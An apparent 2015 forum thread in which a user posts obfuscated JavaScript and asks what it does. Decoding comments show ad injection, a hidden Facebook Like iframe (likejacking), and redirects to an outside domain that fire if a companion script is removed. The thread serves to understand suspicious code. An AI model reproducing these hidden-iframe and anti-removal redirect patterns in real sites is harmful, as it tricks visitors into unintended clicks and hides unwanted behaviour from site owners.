
Can Someone Please Shed Some Light on These Creepy Scripts?

Discussion in 'BlackHat Lounge' started by UniqueProblemSolver, Mar 18, 2015.

  1. UniqueProblemSolver

    UniqueProblemSolver Newbie

    <script type='text/javascript'>
    // Decoded from the \xNN escapes in _0xe8fe (each "\x.." is one character):
    //   [0] "<style>.ban { width: 320px; height: 50px; } @media(min-width: 500px)
    //       { .ban { width: 468px; height: 60px; } } @media(min-width: 800px)
    //       { .ban { width: 728px; height: 90px; } }</style>"
    //   [1] "write"
    //   [2]..[9] the pieces of an AdSense unit: "<div id='ban' class='ban' >", an
    //       async script tag whose src is spliced in, an <ins class='adsbygoogle'
    //       data-ad-client='...' data-ad-slot='...' data-ad-format='auto'>, and
    //       "(adsbygoogle = window.adsbygoogle || []).push({});".
    // The two document.write() calls below emit that markup, splicing in the
    // globals ads, pub and slotauto, which are not defined in this listing
    // (presumably set by another script on the page). Splitting the tag name
    // into "<scr" + "ipt" only hides it from a naive text search for the tag;
    // unlike the scripts further down, this one does not touch window.location.
    var _0xe8fe=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x62\x61\x6E\x20\x7B\x20\x77\x69\x64\x74\x68\x3A\x20\x33\x32\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x35\x30\x70\x78\x3B\x20\x7D\x20\x40\x6D\x65\x64\x69\x61\x28\x6D\x69\x6E\x2D\x77\x69\x64\x74\x68\x3A\x20\x35\x30\x30\x70\x78\x29\x20\x7B\x20\x2E\x62\x61\x6E\x20\x7B\x20\x77\x69\x64\x74\x68\x3A\x20\x34\x36\x38\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x70\x78\x3B\x20\x7D\x20\x7D\x20\x40\x6D\x65\x64\x69\x61\x28\x6D\x69\x6E\x2D\x77\x69\x64\x74\x68\x3A\x20\x38\x30\x30\x70\x78\x29\x20\x7B\x20\x2E\x62\x61\x6E\x20\x7B\x20\x77\x69\x64\x74\x68\x3A\x20\x37\x32\x38\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x39\x30\x70\x78\x3B\x20\x7D\x20\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x69\x64\x3D\x27\x62\x61\x6E\x27\x20\x63\x6C\x61\x73\x73\x3D\x27\x62\x61\x6E\x27\x20\x3E\x3C\x73\x63\x72","\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x73\x72\x63\x3D\x27","\x27\x3E\x3C\x2F\x73\x63\x72","\x69\x70\x74\x3E\x3C\x69\x6E\x73\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x62\x79\x67\x6F\x6F\x67\x6C\x65\x27\x20\x73\x74\x79\x6C\x65\x3D\x27\x64\x69\x73\x70\x6C\x61\x79\x3A\x62\x6C\x6F\x63\x6B\x27\x20\x64\x61\x74\x61\x2D\x61\x64\x2D\x63\x6C\x69\x65\x6E\x74\x3D\x27","\x27\x20\x64\x61\x74\x61\x2D\x61\x64\x2D\x73\x6C\x6F\x74\x3D\x27","\x27\x20\x64\x61\x74\x61\x2D\x61\x64\x2D\x66\x6F\x72\x6D\x61\x74\x3D\x27\x61\x75\x74\x6F\x27\x3E\x3C\x2F\x69\x6E\x73\x3E\x3C\x73\x63\x72","\x69\x70\x74\x3E\x28\x61\x64\x73\x62\x79\x67\x6F\x6F\x67\x6C\x65\x20\x3D\x20\x77\x69\x6E\x64\x6F\x77\x2E\x61\x64\x73\x62\x79\x67\x6F\x6F\x67\x6C\x65\x20\x7C\x7C\x20\x5B\x5D\x29\x2E\x70\x75\x73\x68\x28\x7B\x7D\x29\x3B\x3C\x2F\x73\x63\x72","\x69\x70\x74\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xe8fe[1]](_0xe8fe[0]);document[_0xe8fe[1]](_0xe8fe[2]+_0xe8fe[3]+ads+_0xe8fe[4]+_0xe8fe[5]+pub+_0xe8fe[6]+slotauto+_0xe8fe[7]+_0xe8fe[8]+_0xe8fe[9]);</script>





    Can anyone please explain to me the meaning of these scripts:




    [/PHP]


    <script type='text/javascript'>
    // Review note: this listing will not run as pasted. The forum's soft line
    // wrapping inserted spaces inside the hex escapes (e.g. "\x 65" and "\ x6C"
    // below), which is a SyntaxError; it is kept verbatim only to document what
    // the original did. Decoded, the _0x6e58 strings are:
    //   [0]..[3]  "<scr" / "ipt type='text/javascript'' src='" / "'></scr" / "ipt>"
    //             (note the doubled quote), filled from the global jqr
    //   [4]       "write"
    //   [5]       "<div id='dfb' class='dfb'><iframe src='//www.facebook.com/plugins/like.php?href="
    //   [6]       "&amp;send=false&amp;layout=button_count&amp;width=30&amp;show_faces=false
    //             ...&amp;action=like&amp;height=21' scrolling='no' frameborder='0'
    //             style='... width:50px; left:-19px; height:20px; z-index: 999999;
    //             position: relative;' allowTransparency='true'></iframe></div>"
    //   [7]..[12] a "<style>.dfb {position: absolute; margin-left: -45px;
    //             z-index: 9999...; width:50px; height:20px; overflow:hidden;
    //             visibility: hidden;opacity: <opc> ...}</style>" rule, with the
    //             global opc spliced in five times (the vendor-prefixed opacity forms)
    //   [13]      "http://nobelofficemanagement.com"
    //   [14]      "undefined"
    //   [15]      "location"
    // So the three document.write() calls emit a script tag for jqr, a Facebook
    // Like iframe for the global urlfb, and CSS that keeps that iframe invisible
    // (visibility: hidden, opacity from opc) at a very high z-index -- that
    // hidden Like iframe is the part a reviewer should look at. The tail then does
    //   if (typeof chka === "undefined") window.location = "http://nobelofficemanagement.com";
    // i.e. the page navigates away unless some other script has defined chka
    // (nothing in this thread defines it), and it sets chkb = 2 and chkd = 5,
    // which the next two scripts test for in the same way.
    var _0x6e58=["\x3C\x73\x63\x72","\x69\x70\x74\x20\x74\x79\x70\x 65\x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73 \x63\x72\x69\x70\x74\x27\x27\x20\x73\x72\x63\x3D\x 27","\x27\x3E\x3C\x2F\x73\x63\x72","\x69\x70\x74\x 3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x 69\x64\x3D\x27\x64\x66\x62\x27\x20\x63\x6C\x61\x73 \x73\x3D\x27\x64\x66\x62\x27\x3E\x3C\x69\x66\x72\x 61\x6D\x65\x20\x73\x72\x63\x3D\x27\x2F\x2F\x77\x77 \x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x 6F\x6D\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x6C\x69 \x6B\x65\x2E\x70\x68\x70\x3F\x68\x72\x65\x66\x3D", "\x26\x61\x6D\x70\x3B\x73\x65\x6E\x64\x3D\x66\x61\ x6C\x73\x65\x26\x61\x6D\x70\x3B\x6C\x61\x79\x6F\x7 5\x74\x3D\x62\x75\x74\x74\x6F\x6E\x5F\x63\x6F\x75\ x6E\x74\x26\x61\x6D\x70\x3B\x77\x69\x64\x74\x68\x3 D\x33\x30\x26\x61\x6D\x70\x3B\x73\x68\x6F\x77\x5F\ x66\x61\x63\x65\x73\x3D\x66\x61\x6C\x73\x65\x26\x6 1\x6D\x70\x3B\x66\x6F\x6E\x74\x26\x61\x6D\x70\x3B\ x63\x6F\x6C\x6F\x72\x73\x63\x68\x65\x6D\x65\x3D\x6 C\x69\x67\x68\x74\x26\x61\x6D\x70\x3B\x61\x63\x74\ x69\x6F\x6E\x3D\x6C\x69\x6B\x65\x26\x61\x6D\x70\x3 B\x68\x65\x69\x67\x68\x74\x3D\x32\x31\x27\x20\x73\ x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x27\x6E\x6F\x2 7\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\ x3D\x27\x30\x27\x20\x73\x74\x79\x6C\x65\x3D\x27\x6 2\x6F\x72\x64\x65\x72\x3A\x6E\x6F\x6E\x65\x3B\x20\ x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64\x6 4\x65\x6E\x3B\x20\x77\x69\x64\x74\x68\x3A\x35\x30\ x70\x78\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x39\x7 0\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x32\x30\ x70\x78\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x2 0\x39\x39\x39\x39\x39\x39\x3B\x20\x70\x6F\x73\x69\ x74\x69\x6F\x6E\x3A\x20\x72\x65\x6C\x61\x74\x69\x7 6\x65\x3B\x27\x20\x61\x6C\x6C\x6F\x77\x54\x72\x61\ x6E\x73\x70\x61\x72\x65\x6E\x63\x79\x3D\x27\x74\x7 2\x75\x65\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\ x3E\x3C\x2F\x64\x69\x76\x3E","\x3C\x73\x74\x79\x6C \x65\x3E\x2E\x64\x66\x62\x20\x7B\x70\x6F\x73\x69\x 
    74\x69\x6F\x6E\x3A\x20\x61\x62\x73\x6F\x6C\x75\x74 \x65\x3B\x20\x6D\x61\x72\x67\x69\x6E\x2D\x6C\x65\x 66\x74\x3A\x20\x2D\x34\x35\x70\x78\x3B\x20\x7A\x2D \x69\x6E\x64\x65\x78\x3A\x20\x39\x39\x39\x39\x39\x 39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39 \x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x3B\x 20\x77\x69\x64\x74\x68\x3A\x35\x30\x70\x78\x3B\x20 \x68\x65\x69\x67\x68\x74\x3A\x32\x30\x70\x78\x3B\x 20\x6F\x76\x65\x72\x66\x6C\x6F\x77\x3A\x68\x69\x64 \x64\x65\x6E\x3B\x20\x76\x69\x73\x69\x62\x69\x6C\x 69\x74\x79\x3A\x20\x68\x69\x64\x64\x65\x6E\x3B\x6F \x70\x61\x63\x69\x74\x79\x3A\x20","\x3B\x2D\x6D\x6 F\x7A\x2D\x6F\x70\x61\x63\x69\x74\x79\x20\x3A\x20" ,"\x3B\x2D\x6D\x73\x2D\x66\x69\x6C\x74\x65\x72\x3A \x20\x27\x61\x6C\x70\x68\x61\x28\x6F\x70\x61\x63\x 69\x74\x79\x3D","\x29\x27\x3B\x66\x69\x6C\x74\x65\ x72\x3A\x20\x61\x6C\x70\x68\x61\x28\x6F\x70\x61\x6 3\x69\x74\x79\x20\x3D\x20","\x29\x3B\x20\x2D\x6D\x 73\x2D\x66\x69\x6C\x74\x65\x72\x3A\x27\x70\x72\x6F \x67\x69\x64\x3A\x44\x58\x49\x6D\x61\x67\x65\x54\x 72\x61\x6E\x73\x66\x6F\x72\x6D\x2E\x4D\x69\x63\x72 \x6F\x73\x6F\x66\x74\x2E\x41\x6C\x70\x68\x61\x28\x 4F\x70\x61\x63\x69\x74\x79\x3D","\x29\x27\x3B\x7D\ x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x68\x74\x74\x70 \x3A\x2F\x2F\x6E\x6F\x62\x65\x6C\x6F\x66\x66\x69\x 63\x65\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E \x63\x6F\x6D","\x75\x6E\x64\x65\x66\x69\x6E\x65\x6 4","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];document[_0x6e58[4]](_0x6e58[0]+_0x6e58[1]+jqr+_0x6e58[2]+_0x6e58[3]);document[_0x6e58[4]](_0x6e58[5]+urlfb+_0x6e58[6]);document[_0x6e58[4]](_0x6e58[7]+opc+_0x6e58[8]+opc+_0x6e58[9]+opc+_0x6e58[10]+opc+_0x6e58[11]+opc+_0x6e58[12]);var chkaurl=_0x6e58[13];if( typeof chka===_0x6e58[14]){window[_0x6e58[15]]=chkaurl;} ;var chkb=2;var chkd=5;
    </script>
    <script type='text/javascript'>
    // Review note: same forum wrapping damage as the script above (spaces inside
    // the \xNN escapes), so this does not parse as pasted. Decoded, _0x5c02 is:
    //   [0]..[3] a '<div style="display: none">' holding a script tag with
    //            id="_wau4d6" whose body is
    //              var _wau = _wau || []; _wau.push(["small", "<amg>", "4d6"]);
    //              (function() {var s=document.createElement("script"); s.async=true;
    //               s.src="http://widgets.amung.us/small.js";
    //               document.getElementsByTagName("head")[0].appendChild(s);})();
    //            i.e. a whos.amung.us visitor-counter snippet, hidden with
    //            display:none, with the counter id taken from the global amg
    //   [4] "write"   [5] "http://nobelofficemanagement.com"   [6] "undefined"   [7] "location"
    // After the document.write() the tail does
    //   if (typeof chkd === "undefined") window.location = chkaurl;
    // chkd is only assigned by the preceding script (var chkd=5), so this is a
    // check that that script is still present: remove it and the page redirects.
    var _0x5c02=["\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\ x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x6E\x6F\x6E\x6 5\x22\x3E\x3C\x73\x63\x72","\x69\x70\x74\x20\x69\x 64\x3D\x22\x5F\x77\x61\x75\x34\x64\x36\x22\x3E\x76 \x61\x72\x20\x5F\x77\x61\x75\x20\x3D\x20\x5F\x77\x 61\x75\x20\x7C\x7C\x20\x5B\x5D\x3B\x20\x5F\x77\x61 \x75\x2E\x70\x75\x73\x68\x28\x5B\x22\x73\x6D\x61\x 6C\x6C\x22\x2C\x20\x22","\x22\x2C\x20\x22\x34\x64\ x36\x22\x5D\x29\x3B\x28\x66\x75\x6E\x63\x74\x69\x6 F\x6E\x28\x29\x20\x7B\x76\x61\x72\x20\x73\x3D\x64\ x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x7 4\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x22\x73\x63\ x72\x69\x70\x74\x22\x29\x3B\x20\x73\x2E\x61\x73\x7 9\x6E\x63\x3D\x74\x72\x75\x65\x3B\x73\x2E\x73\x72\ x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x69\x6 4\x67\x65\x74\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\ x73\x2F\x73\x6D\x61\x6C\x6C\x2E\x6A\x73\x22\x3B\x6 4\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\ x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4 E\x61\x6D\x65\x28\x22\x68\x65\x61\x64\x22\x29\x5B\ x30\x5D\x2E\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6 C\x64\x28\x73\x29\x3B\x7D\x29\x28\x29\x3B\x3C\x2F\ x73\x63\x72","\x69\x70\x74\x3E\x3C\x2F\x64\x69\x76 \x3E","\x77\x72\x69\x74\x65","\x68\x74\x74\x70\x3A \x2F\x2F\x6E\x6F\x62\x65\x6C\x6F\x66\x66\x69\x63\x 65\x6D\x61\x6E\x61\x67\x65\x6D\x65\x6E\x74\x2E\x63 \x6F\x6D","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64"," \x6C\x6F\x63\x61\x74\x69\x6F\x6E"];document[_0x5c02[4]](_0x5c02[0]+_0x5c02[1]+amg+_0x5c02[2]+_0x5c02[3]);var chkaurl=_0x5c02[5];if( typeof chkd===_0x5c02[6]){window[_0x5c02[7]]=chkaurl;} ;
    </script>
    <script>
    // Review note: same wrapping damage (spaces inside the \xNN escapes), so it
    // does not parse as pasted. Decoded, _0xe941[0..12] are the names used by the
    // standard Google Analytics loader:
    //   "script", "//www.google-analytics.com/analytics.js", "ga",
    //   "GoogleAnalyticsObject", "l", "push", "q", "createElement",
    //   "getElementsByTagName", "async", "src", "insertBefore", "parentNode"
    // and the IIFE below is that loader with every property looked up through
    // the array instead of written literally. Then:
    //   [13]..[16] document.write() of a script tag whose body is
    //              "  ga('create', '" + gga + "', 'auto');"  (gga is a global)
    //   [17] "write"   [18] "send"   [19] "pageview"   ->  ga("send", "pageview")
    //   [20] "http://nobelofficemanagement.com"   [21] "undefined"   [22] "location"
    // and the tail repeats the presence check of the other scripts:
    //   if (typeof chkd === "undefined") window.location = "http://nobelofficemanagement.com";
    var _0xe941=["\x73\x63\x72\x69\x70\x74","\x2F\x2F\x77\x77\x77\x 2E\x67\x6F\x6F\x67\x6C\x65\x2D\x61\x6E\x61\x6C\x79 \x74\x69\x63\x73\x2E\x63\x6F\x6D\x2F\x61\x6E\x61\x 6C\x79\x74\x69\x63\x73\x2E\x6A\x73","\x67\x61","\x 47\x6F\x6F\x67\x6C\x65\x41\x6E\x61\x6C\x79\x74\x69 \x63\x73\x4F\x62\x6A\x65\x63\x74","\x6C","\x70\x75 \x73\x68","\x71","\x63\x72\x65\x61\x74\x65\x45\x6C \x65\x6D\x65\x6E\x74","\x67\x65\x74\x45\x6C\x65\x6 D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\ x65","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x69\x 6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\ x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x3C\x73\x63 \x72","\x69\x70\x74\x3E\x20\x20\x67\x61\x28\x27\x6 3\x72\x65\x61\x74\x65\x27\x2C\x20\x27","\x27\x2C\x 20\x27\x61\x75\x74\x6F\x27\x29\x3B\x3C\x2F\x73\x63 \x72","\x69\x70\x74\x3E","\x77\x72\x69\x74\x65","\ x73\x65\x6E\x64","\x70\x61\x67\x65\x76\x69\x65\x77 ","\x68\x74\x74\x70\x3A\x2F\x2F\x6E\x6F\x62\x65\x6 C\x6F\x66\x66\x69\x63\x65\x6D\x61\x6E\x61\x67\x65\ x6D\x65\x6E\x74\x2E\x63\x6F\x6D","\x75\x6E\x64\x65 \x66\x69\x6E\x65\x64","\x6C\x6F\x63\x61\x74\x69\x6 F\x6E"];(function (_0xba3ex1,_0xba3ex2,_0xba3ex3,_0xba3ex4,_0xba3ex5 ,_0xba3ex6,_0xba3ex7){_0xba3ex1[_0xe941[3]]=_0xba3ex5;_0xba3ex1[_0xba3ex5]=_0xba3ex1[_0xba3ex5]||function (){(_0xba3ex1[_0xba3ex5][_0xe941[6]]=_0xba3ex1[_0xba3ex5][_0xe941[6]]||[])[_0xe941[5]](arguments);} ,_0xba3ex1[_0xba3ex5][_0xe941[4]]=1* new Date();_0xba3ex6=_0xba3ex2[_0xe941[7]](_0xba3ex3),_0xba3ex7=_0xba3ex2[_0xe941[8]](_0xba3ex3)[0];_0xba3ex6[_0xe941[9]]=1;_0xba3ex6[_0xe941[10]]=_0xba3ex4;_0xba3ex7[_0xe941[12]][_0xe941[11]](_0xba3ex6,_0xba3ex7);} )(window,document,_0xe941[0],_0xe941[1],_0xe941[2]);document[_0xe941[17]](_0xe941[13]+_0xe941[14]+gga+_0xe941[15]+_0xe941[16]);ga(_0xe941[18],_0xe941[19]);var chkaurl=_0xe941[20];if( typeof chkd===_0xe941[21]){window[_0xe941[22]]=chkaurl;} ;
    </script> I apologize if I had put this in the wrong section, but I couldn't post it in "Web Design" because I'm not a Jr. VIP. I would really appreciate your help, guys!
     
  2. pxoxrxn

    pxoxrxn Supreme Member

    You should have put this in a paste bin. It looks like it is just declaring an array.
     
  3. bartosimpsonio

    bartosimpsonio Jr. VIP Jr. VIP Premium Member

    I decoded a similar one for another member here.

    Every one of those \xSOMETHING sequences is just a hex escape for a UTF-8 character.

    It's an obscured script that injects some HTML into pages. Some of those may not be malicious, but they normally are.
     
  4. Zwielicht

    Zwielicht Moderator Staff Member Moderator Jr. VIP

    Next time you want to post code, there's a little icon that looks like this: "#". It puts the code into a separate scrollable box so that it doesn't take up half the page. :)

    Code:
    Example
     
    Last edited: Mar 19, 2015
  5. UniqueProblemSolver

    UniqueProblemSolver Newbie

    Thank you so much everyone! I thought no one had replied, so I found the solution by being positively stubborn (persistent) as usual. It turned out the guy is obfuscating Google Ads code, so THEY ARE EXTREMELY MALICIOUS. The guy makes thousands of dollars every month just by spamming. When you see his website, all you see is a top banner ad and 50 posts that he reposts across his many websites, so every time one gets suspended, he still has other websites.